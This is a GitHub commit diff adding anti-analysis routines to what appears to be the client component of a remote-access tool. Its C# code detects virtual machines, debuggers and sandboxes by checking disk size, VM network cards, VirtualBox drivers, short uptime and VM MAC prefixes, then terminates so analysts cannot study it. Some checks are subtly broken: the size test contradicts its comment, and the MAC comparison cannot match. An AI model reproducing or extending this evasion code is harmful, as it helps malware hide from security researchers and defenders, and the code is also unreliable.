Add files via upload
This commit is contained in:
MrDevBot
GitHub
parent
279566d29c
commit
0e5870a795
@ -1,26 +1,95 @@
|
|||||||
using System;
|
using System;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
|
using System.Linq;
|
||||||
using System.Management;
|
using System.Management;
|
||||||
using System.Runtime.InteropServices;
|
using System.Net.NetworkInformation;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
// │ Author : NYAN CAT
|
|
||||||
// │ Name : Anti Analysis v0.2
|
// │ Author : NYAN CAT
|
||||||
// │ Contact : https://github.com/NYAN-x-CAT
|
// │ Name : Anti Analysis v0.2
|
||||||
|
// │ Contact : https://github.com/NYAN-x-CAT
|
||||||
// This program is distributed for educational purposes only.
|
|
||||||
|
// This program is distributed for educational purposes only.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
namespace Client.Helper
|
namespace Client.Helper
|
||||||
{
|
{
|
||||||
|
|
||||||
class Anti_Analysis
|
class Anti_Analysis
|
||||||
{
|
{
|
||||||
|
private static long GB_50 = 50000000000;
|
||||||
public static void RunAntiAnalysis()
|
public static void RunAntiAnalysis()
|
||||||
{
|
{
|
||||||
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
|
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
|
||||||
Environment.FailFast(null);
|
Environment.FailFast(null);
|
||||||
|
}
|
||||||
|
|
||||||
|
internal static bool SmallHDD()
|
||||||
|
{
|
||||||
|
|
||||||
|
// Method One - main drive smaller than 50gb, likely a VM
|
||||||
|
long driveSize = Methods.GetMainDriveSize();
|
||||||
|
if (driveSize <= GB_50 * 2)
|
||||||
|
return true;
|
||||||
|
|
||||||
|
// Method Two - has common card of virtual machine
|
||||||
|
if (HasVMCard())
|
||||||
|
return true;
|
||||||
|
|
||||||
|
// Method Three - checks for vm drivers
|
||||||
|
if (HasVBOXDriver())
|
||||||
|
return true;
|
||||||
|
|
||||||
|
// Method Four - if machine has been on for less than 5 mins
|
||||||
|
if (GetUptime() < TimeSpan.FromMinutes(5))
|
||||||
|
return true;
|
||||||
|
|
||||||
|
// Method Five - has VM mac address
|
||||||
|
if (HasVMMac())
|
||||||
|
return true;
|
||||||
|
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
private static bool HasVMMac()
|
||||||
|
{
|
||||||
|
var macAddr =
|
||||||
|
(
|
||||||
|
from nic in NetworkInterface.GetAllNetworkInterfaces()
|
||||||
|
where nic.OperationalStatus == OperationalStatus.Up
|
||||||
|
select nic.GetPhysicalAddress().ToString()
|
||||||
|
).FirstOrDefault();
|
||||||
|
|
||||||
|
var macs = new[]
|
||||||
|
{
|
||||||
|
"00-05-69",
|
||||||
|
"00:05:69",
|
||||||
|
"000569",
|
||||||
|
"00-50-56",
|
||||||
|
"00:50:56",
|
||||||
|
"005056",
|
||||||
|
"00-0C-29",
|
||||||
|
"00:0C:29",
|
||||||
|
"000C29",
|
||||||
|
"00-1C-14",
|
||||||
|
"00:1C:14",
|
||||||
|
"001C14",
|
||||||
|
"08-00-27",
|
||||||
|
"08:00:27",
|
||||||
|
"080027",
|
||||||
|
};
|
||||||
|
foreach (string mac in macs)
|
||||||
|
{
|
||||||
|
if (mac == macAddr)
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
return false;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
private static bool DetectVirtualMachine()
|
private static bool DetectVirtualMachine()
|
||||||
{
|
{
|
||||||
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
|
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user